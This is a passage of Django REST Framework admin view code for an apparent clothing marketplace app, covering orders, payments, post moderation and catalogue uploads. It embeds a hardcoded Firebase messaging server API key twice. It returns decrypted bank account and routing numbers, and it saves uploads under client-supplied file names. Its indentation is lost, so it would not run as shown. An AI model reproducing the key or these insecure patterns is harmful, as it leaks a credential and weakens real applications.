if ((data['user_name']=='') and (data['start_date']!='') and (data['end_date']!='')):
print("else chle")
orders = OrderTrn.objects.all().count()
trans = OrderTrn.objects.all().order_by('-transaction_time')
if trans:
transerializer = OrderTrnSerializer(trans,many=True)
trans = transerializer.data
for ii in trans:
ii['transaction_time'] = ii['transaction_time'][:10]
ii['refund_time'] = ii['refund_time'][:10]
ii['service_tax'] = round(float(ii['total_amount']) *(.10),2)
for index,data in enumerate(trans):
trans_user = User.objects.filter(id=data['user'])
if trans_user:
trans_user_serializer = UserSerializer(trans_user,many=True)
trans[index]['user'] = trans_user_serializer.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":trans,'count':transerializer.data.__len__()}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#######################################################################################
# get_order_detail
#######################################################################################
@api_view(['GET'])
def Ord_Detail(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
orders = OrderPost.objects.all().count()
ord_det = OrderPost.objects.all().order_by('-created_time')
if ord_det:
ordserializer = OrderPostSerializer(ord_det,many=True)
odr = ordserializer.data
for ii in odr:
ii['created_time'] = ii['created_time'][:10]
for i in odr:
if i['order_status']==1:
i['order_status']="Accepted"
elif i['order_status']==2:
i['order_status']="Rejected"
elif i['order_status']==0:
i['order_status']="Pending"
elif i['order_status']== -1:
i['order_status']="Deleted"
elif i['order_status']==-2:
i['order_status']="Cancelled"
odr_post_image = PostImage.objects.filter(id=i['post_images']).values("post_images")
for i1 in odr_post_image:
i['post_images'] = i1['post_images']
odr_user = User.objects.filter(id=i['user']).values("username")
for i1 in odr_user:
i['user'] = i1['username']
odr_post_price = Post.objects.filter(id=i['post']).values("price")
for i1 in odr_post_price:
i['price'] = i1['price']
odr_post = Post.objects.filter(id=i['post']).values("post_description")
for i1 in odr_post:
i['post'] = i1['post_description'][:30]
odr_size = Size.objects.filter(id=i['size']).values("size")
for i1 in odr_size:
i['size'] = i1['size']
# #######################add post####################
# for index, data in enumerate(odr):
# ordr_post = Post.objects.filter(id=data['post'])
# print(ordr_post)
# if ordr_post:
# order_post_serializer = PostSerializer(ordr_post)
# odr[index]['post'] = order_post_serializer.data
# ########################add user##############################
# for index,data in enumerate(odr):
# pst_rpt_user = User.objects.filter(id=data['user'])
# if pst_rpt_user:
# pst_rpt_serializer_u = UserSerializer(pst_rpt_user,many=True)
# odr[index]['user'] = pst_rpt_serializer_u.data[0]
# #####################add size#################################
# for index,data in enumerate(odr):
# odr_size = Size.objects.filter(id = data['size'])
# if odr_size:
# odr_size_serializer = SizeSerializer(odr_size,many=True)
# odr[index]['size'] = odr_size_serializer.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":odr}, status=status.HTTP_200_OK)
else:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[],}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
###############################################################################################
# Notification _list_admin
###############################################################################################
@api_view(['GET'])
def Admin_Notified(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
print(token1)
user = token1.user
checkGroup = user.groups.filter(name = 'Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"},status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
contact_us = ContactUs.objects.all().order_by('-created_time')
if contact_us:
print("kkk")
lst_data = ContactUsSerializer(contact_us,many=True)
print("jjj")
contct = lst_data.data
for ii in contct:
ii['created_time'] = ii['created_time'][:10]
for index,data in enumerate(contct):
cont_user = User.objects.filter(id=data['user'])
if cont_user:
cont_user_serializer = UserSerializer(cont_user,many=True)
contct[index]['user'] = cont_user_serializer.data[0]
#########################shared post comment########################
try:
ids =Post.objects.filter(post_status=1,post_type="promotional")
shared_pst = PostComment.objects.filter(status=1,post_id__in=ids).order_by('-created_time')
print(shared_pst)
if shared_pst:
shared_dta = PostCommentSerializer(shared_pst,many=True)
shared_pst = shared_dta.data
print(shared_pst,"dekho")
for ii in shared_pst:
print("hh")
ii['created_time'] = ii['created_time'][:10]
######################image
for index,data in enumerate(shared_pst):
promo_image = PostImage.objects.filter(post_id=data['post'])
if promo_image:
promo_serial = PostImageSerializer(promo_image, many=True)
shared_pst[index]['image'] = promo_serial.data[0]
############add post
for index,data in enumerate(shared_pst):
shared_rpt = Post.objects.filter(id=data['post'])
if shared_rpt:
shared_rpt_serializer = PostSerializer(shared_rpt,many=True)
shared_pst[index]['post'] = shared_rpt_serializer.data[0]
###########add user
for index,data in enumerate(shared_pst):
shared_pst_user = User.objects.filter(id=data['user'])
if shared_pst_user:
shared_pst_serializer_u = UserSerializer(shared_pst_user,many=True)
shared_pst[index]['user'] = shared_pst_serializer_u.data[0]
except:
shared_pst =[]
##################disabled post #############################
try:
disabled_pst = ReportPost.objects.filter(status=0).order_by('-created_time')
if disabled_pst:
disable_dta = ReportPostSerializer(disabled_pst,many=True)
if disable_dta:
disable_pst = disable_dta.data
for ii in disable_pst:
ii['created_time'] = ii['created_time'][:10]
############add post
for index,data in enumerate(disable_pst):
disable_rpt = Post.objects.filter(id=data['post'])
if disable_rpt:
disable_rpt_serializer = PostSerializer(disable_rpt,many=True)
disable_pst[index]['post'] = disable_rpt_serializer.data[0]
disable_pst[index]['post']['created_time'] = disable_pst[index]['post']['created_time'][:10]
disable_pst[index]['post']['post_description'] = disable_pst[index]['post']['post_description'][:30]
###########add user
for index,data in enumerate(disable_pst):
disable_pst_user = User.objects.filter(id=data['user'])
if disable_pst_user:
disable_rpt_serializer_u = UserSerializer(disable_pst_user,many=True)
disable_pst[index]['user'] = disable_rpt_serializer_u.data[0]
else:
disable_pst =[]
except:
disable_pst =[]
###############reported post###################
try:
report_pst = ReportPost.objects.filter(status=1).order_by('-created_time')
if report_pst:
pst_dta = ReportPostSerializer(report_pst,many=True)
pst = pst_dta.data
for ii in pst:
ii['created_time'] = ii['created_time'][:10]
######################image
for index,data in enumerate(pst):
promo_image = PostImage.objects.filter(post_id=data['post'])
if promo_image:
promo_serial = PostImageSerializer(promo_image, many=True)
pst[index]['image'] = promo_serial.data[0]
############add post
for index,data in enumerate(pst):
pst_rpt = Post.objects.filter(id=data['post'])
if pst_rpt:
pst_rpt_serializer = PostSerializer(pst_rpt,many=True)
pst[index]['post'] = pst_rpt_serializer.data[0]
pst[index]['post']['created_time'] = pst[index]['post']['created_time'][:10]
pst[index]['post']['post_description'] = pst[index]['post']['post_description'][:30]
###########add user
for index,data in enumerate(pst):
pst_rpt_user = User.objects.filter(id=data['user'])
if pst_rpt_user:
pst_rpt_serializer_u = UserSerializer(pst_rpt_user,many=True)
pst[index]['user'] = pst_rpt_serializer_u.data[0]
return Response({"message" : "Response Send Successfully","status" : "1","support":contct,"report":pst,"disable_post":disable_pst,"shared_post_comment":shared_pst},status=status.HTTP_200_OK)
except:
return Response({"message" : "Response Send Successfully","status" : "1","support":[],"report":[],"disable_post":[],"shared_post_comment":shared_pst},status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"},status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#####################################################################################
# Disable post by admin
#####################################################################################
@api_view(['POST'])
def DisablePostByAdmin(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
post_id = received_json_data['post_id']
post = Post.objects.get(id=post_id,post_status =1)
print(post.user_id)
user1 = User.objects.get(id =post.user_id)
if post:
post1 = Post.objects.filter(id = post.id,user_id=post.user_id).update(post_status=0)
p=ReportPost.objects.filter(post_id=post_id).update(status=0)
print(p)
if post1:
post_count = user1.post_count
User.objects.filter(id = post.user_id).update(post_count = post_count-1)
favpost = Favourite.objects.filter(post_id=post_id)
if favpost:
Favourite.objects.filter(post_id=post_id).update(status=0)
notify = SenddisableNotification(post.user_id,"post disabled","Admin disabled your post","post disabled",post.id)
return Response({"message" : deletePostSuccessMessage, "status" : "1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
import requests
########################################################################################################
# send disable notification
########################################################################################################
def SenddisableNotification(receiverId,title,message,tag,post_id):
try:
push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
idsArray_ios = []
receiver = User.objects.get(id=receiverId)
idsArray_ios.append(receiver.deviceId)
registration_ids_ios = idsArray_ios
message_title = title
message_body = message
if idsArray_ios.__len__() > 0:
data_message = {
"message_title": title,
"message_body": message,
"tag":tag,
"post_id": post_id,
}
result = push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title,sound ="default",message_body=message_body, data_message=data_message)
print(result,"1111111111111111")
except Exception as e:
return False
#####################################################################################
# enable post by admin
#####################################################################################
@api_view(['POST'])
def enablePostByAdmin(request):
try:
with transaction.atomic():
received_json_data = json.loads(request.body, strict=False)
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
post_id = received_json_data['post_id']
post = Post.objects.get(id=post_id,post_status =0)
print(post.user_id)
user1 = User.objects.get(id =post.user_id)
if post:
post1 = Post.objects.filter(id = post.id,user_id=post.user_id).update(post_status=1)
p=ReportPost.objects.filter(post_id=post_id).update(status=1)
print(p)
if post1:
post_count = user1.post_count
User.objects.filter(id = post.user_id).update(post_count = post_count+1)
favpost = Favourite.objects.filter(post_id=post_id)
if favpost:
Favourite.objects.filter(post_id=post_id).update(status=1)
notify = SendenableNotification(post.user_id,"post enabled","Admin enableded your post","post enableded",post.id)
return Response({"message" : deletePostSuccessMessage, "status" : "1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
import requests
########################################################################################################
# send enable notification
########################################################################################################
def SendenableNotification(receiverId,title,message,tag,post_id):
try:
push_service = FCMNotification(api_key="AAAAVQB1c9E:APA91bGcmaXhcyevDS9XKCF3lATdSoxMPqNoIZIDO8o34VCjV-Aj5hiAW1M5CwtBBeBVm1IsUVpQBtVLWTAG6isdVfxzGdMAFFHKzee7X72uYqWbeppdcAQbt0g9FrWhrbld4ZROgoeY")
idsArray_ios = []
receiver = User.objects.get(id=receiverId)
idsArray_ios.append(receiver.deviceId)
registration_ids_ios = idsArray_ios
message_title = title
message_body = message
if idsArray_ios.__len__() > 0:
data_message = {
"message_title": title,
"message_body": message,
"tag":tag,
"post_id": post_id,
}
result = push_service.notify_multiple_devices(registration_ids=registration_ids_ios, message_title=title,sound ="default",message_body=message_body, data_message=data_message)
print(result,"1111111111111111")
except Exception as e:
return False
#####################################################################################
# get users payable by admin
#####################################################################################
@api_view(['GET'])
def GetUsersForPayment(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
paymentss = DuePayment.objects.filter(payment_status =1).order_by('-created_time')
try:
paymentserializer = DuePaymentSerializer(paymentss,many=True)
pay = paymentserializer.data
for index,data in enumerate(pay):
user_bank = BankDetail.objects.filter(user_id=data['user'])
if user_bank:
bnk_serial = BankDetailSerializer(user_bank,many=True)
pay[index]['bank_detail'] = bnk_serial.data[0]
pay[index]['bank_detail']['Account_name'] = bytes(pay[index]['bank_detail']['Account_name'],'utf-8')
pay[index]['bank_detail']['Account_name'] = cipher_suite.decrypt(pay[index]['bank_detail']['Account_name'])
pay[index]['bank_detail']['Type'] = bytes(pay[index]['bank_detail']['Type'],'utf-8')
pay[index]['bank_detail']['Type'] = cipher_suite.decrypt(pay[index]['bank_detail']['Type'])
pay[index]['bank_detail']['routing_number'] = bytes(pay[index]['bank_detail']['routing_number'],'utf-8')
pay[index]['bank_detail']['routing_number'] = cipher_suite.decrypt(pay[index]['bank_detail']['routing_number'])
pay[index]['bank_detail']['acc_number'] = bytes(pay[index]['bank_detail']['acc_number'],'utf-8')
pay[index]['bank_detail']['acc_number'] = cipher_suite.decrypt(pay[index]['bank_detail']['acc_number'])
for index,data in enumerate(pay):
pay_user = User.objects.filter(id=data['user'])
if pay_user:
pay_serializer_u = UserSerializer(pay_user,many=True)
pay[index]['user'] = pay_serializer_u.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":pay}, status=status.HTTP_200_OK)
except:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[]}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#####################################################################################
# get history of payment
#####################################################################################
@api_view(['GET'])
def PaymentHistory(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
paymentss = DuePayment.objects.filter(payment_status =0).order_by('-transaction_time')
try:
paymentserializer = DuePaymentSerializer(paymentss,many=True)
pay = paymentserializer.data
print(pay)
for index,data in enumerate(pay):
user_bank = BankDetail.objects.filter(user_id=data['user'])
if user_bank:
bnk_serial = BankDetailSerializer(user_bank,many=True)
pay[index]['bank_detail'] = bnk_serial.data[0]
pay[index]['bank_detail']['Account_name'] = bytes(pay[index]['bank_detail']['Account_name'],'utf-8')
pay[index]['bank_detail']['Account_name'] = cipher_suite.decrypt(pay[index]['bank_detail']['Account_name'])
pay[index]['bank_detail']['Type'] = bytes(pay[index]['bank_detail']['Type'],'utf-8')
pay[index]['bank_detail']['Type'] = cipher_suite.decrypt(pay[index]['bank_detail']['Type'])
pay[index]['bank_detail']['routing_number'] = bytes(pay[index]['bank_detail']['routing_number'],'utf-8')
pay[index]['bank_detail']['routing_number'] = cipher_suite.decrypt(pay[index]['bank_detail']['routing_number'])
pay[index]['bank_detail']['acc_number'] = bytes(pay[index]['bank_detail']['acc_number'],'utf-8')
pay[index]['bank_detail']['acc_number'] = cipher_suite.decrypt(pay[index]['bank_detail']['acc_number'])
for index,data in enumerate(pay):
pay_user = User.objects.filter(id=data['user'])
if pay_user:
pay_serializer_u = UserSerializer(pay_user,many=True)
pay[index]['user'] = pay_serializer_u.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":pay}, status=status.HTTP_200_OK)
except:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[]}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################################################################
# Add promotional post by
############################################################################################################
@api_view(['POST'])
def add_promotonal_post(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
nowTime = datetime.datetime.utcnow().replace(tzinfo=utc)
post = Post.objects.create(post_description = request.data['post_description'],
user_id = user.id,
created_time = nowTime,
post_status = 1,
post_type = "promotional")
if post is not None:
return Response({"message" : addPostSuccessMessage, "status" : "1","post":PostSerializer(post).data['id']}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################################################################
# Delete promotional post by admin
############################################################################################################
@api_view(['POST'])
def delete_promotonal_post(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
postId=request.data['id']
del_post = Post.objects.filter(id = postId,post_status=1).exists()
if del_post:
dele=Post.objects.filter(id = postId).update(post_status = 0)
fav = Favourite.objects.filter(post_id=postId)
if fav:
Favourite.objects.filter(post_id=postId).update(status=0)
if dele:
PostImage.objects.filter(post_id=postId).delete()
return Response({"message" : deleteSuccessMessage, "status" : "1"}, status=status.HTTP_201_CREATED)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
###############################################################################################################################
# get promotionalpost history
###############################################################################################################################
@api_view(['GET'])
def Get_promo_History(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
try:
promo_posts = Post.objects.filter(post_type="promotional",post_status=1)
if promo_posts:
promo_serializer = PostSerializer(promo_posts,many=True)
promo = promo_serializer.data
for i1 in promo:
i1['post_description'] = i1['post_description'][:30]
i1['created_time'] = i1['created_time'][:10]
for index, data in enumerate(promo):
print(data['id'])
promo_image = PostImage.objects.filter(post_id=data['id'])
if promo_image:
promo_serial = PostImageSerializer(promo_image, many=True)
promo[index]['image'] = promo_serial.data[0]
return Response({"message" : "Response Send Succesfully","status" : "1","response":promo}, status=status.HTTP_200_OK)
except:
return Response({"message" : "Response Send Succesfully","status" : "1","response":[]}, status=status.HTTP_200_OK)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
############################################################################################################
# Clear Due Payment by admin
############################################################################################################
@api_view(['POST'])
def clear_due_payment(request):
try:
with transaction.atomic():
try:
API_key = request.META.get('HTTP_AUTHORIZATION')
token1 = Token.objects.get(key=API_key)
user = token1.user
checkGroup = user.groups.filter(name='Admin').exists()
if checkGroup == False:
return Response({"message" : errorMessageUnauthorised, "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
except:
return Response({"message": errorMessageUnauthorised, "status": "0"},status=status.HTTP_401_UNAUTHORIZED)
dueId=request.data['id']
nowTime = datetime.datetime.now()
del_due = DuePayment.objects.filter(id = dueId,payment_status=1).exists()
if del_due:
dele=DuePayment.objects.filter(id = dueId).update(payment_status = 0,transaction_time = nowTime)
return Response({"message" : deleteSuccessMessage, "status" : "1"}, status=status.HTTP_201_CREATED)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception:
print(traceback.format_exc())
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
####################################################################
# apis to add custom data for custom module
###################################################################
#======================================
# api for add pattern
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Add_Patterns(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token = Token.objects.get(key=API_key)
user = token.user
checkGroup = user.groups.filter(name='Admin').exists()
except Exception as e1:
return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
pattern = request.data['pattern']
price = request.data['price']
file = request.FILES.get('image')
imageUrl = ""
if file is not None:
fs = FileSystemStorage()
filename = fs.save("patternimages/"+str(user.id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
patt = Pattern.objects.create(pattern = pattern,
image = uploaded_file_url,
status = 1,
price = price)
return Response({ 'message': addSuccessMessage, "status":"1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for add shapes
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Add_Shapes(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token = Token.objects.get(key=API_key)
user = token.user
checkGroup = user.groups.filter(name='Admin').exists()
except Exception as e1:
return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
shape = request.data['shape']
price = request.data['price']
file = request.FILES.get('image')
imageUrl = ""
if file is not None:
fs = FileSystemStorage()
filename = fs.save("shapesimages/"+str(user.id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
shp = Shape.objects.create(shape = shape,
image = uploaded_file_url,
status = 1,
price = price)
return Response({ 'message': addSuccessMessage, "status":"1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for add cloth style
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Add_Cloth_Style(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token = Token.objects.get(key=API_key)
user = token.user
checkGroup = user.groups.filter(name='Admin').exists()
except Exception as e1:
return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
style_name = request.data['style_name']
price = request.data['price']
shp = ClothStyle.objects.create(style_name = style_name,
status = 1,
price = price)
return Response({ 'message': addSuccessMessage, "status":"1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for add cloth style colour
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Add_Cloth_Style_colour(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token = Token.objects.get(key=API_key)
user = token.user
checkGroup = user.groups.filter(name='Admin').exists()
except Exception as e1:
return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
colour = request.data['colour']
colour_code = request.data['colour_code']
cloth_style = request.data['cloth_style']
file = request.FILES.get('image')
imageUrl = ""
if file is not None:
fs = FileSystemStorage()
filename = fs.save("clothstylecolourimages/"+str(user.id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
shp = ClothStyleColour.objects.create(colour = colour,
colour_code = colour_code,
status = 1,
cloth_style_id = cloth_style,
front_image = uploaded_file_url)
return Response({ 'message': addSuccessMessage, "status":"1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#=============================================
# api for add cloth style colour Images
#=============================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Add_Cloth_Style_colour_Images(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token = Token.objects.get(key=API_key)
user = token.user
checkGroup = user.groups.filter(name='Admin').exists()
except Exception as e1:
return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
colour = request.data['colour']
file = request.FILES.get('image')
imageUrl = ""
if file is not None:
fs = FileSystemStorage()
filename = fs.save("clothstylecolourimages/"+str(user.id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
shp = ClothStyleColourImage.objects.create(colour_id = colour,
status = 1,
image = uploaded_file_url)
return Response({ 'message': addSuccessMessage, "status":"1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for shape colour
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Shape_Colour(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token = Token.objects.get(key=API_key)
user = token.user
checkGroup = user.groups.filter(name='Admin').exists()
except Exception as e1:
return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
colour = request.data['colour']
file = request.FILES.get('image')
imageUrl = ""
if file is not None:
fs = FileSystemStorage()
filename = fs.save("shapecolourimages/"+str(user.id)+"/"+file.name, file)
uploaded_file_url = fs.url(filename)
shp = ShapeColour.objects.create(colour = colour,
image = uploaded_file_url)
return Response({ 'message': addSuccessMessage, "status":"1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
except Exception as e:
print(traceback.format_exc())
return Response({"message" : str(e), "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
#======================================
# api for sew
#======================================
@AppVersion_required
@csrf_exempt
@api_view(['PUT'])
def Seww(request):
try:
with transaction.atomic():
API_key = request.META.get('HTTP_AUTHORIZATION')
if API_key is not None:
try:
token = Token.objects.get(key=API_key)
user = token.user
checkGroup = user.groups.filter(name='Admin').exists()
except Exception as e1:
return Response({"message" : "Session Expired!! Please Login Again", "status" : "0"}, status=status.HTTP_401_UNAUTHORIZED)
if checkGroup:
sew_name = request.data['sew_name']
shp = Sew.objects.create(sew_name = sew_name)
return Response({ 'message': addSuccessMessage, "status":"1"}, status=status.HTTP_200_OK)
else:
return Response({"message" : errorMessage, "status" : "0"}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
else:
return Response({'status': "0", 'message': 'Timezone is missing!'}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)
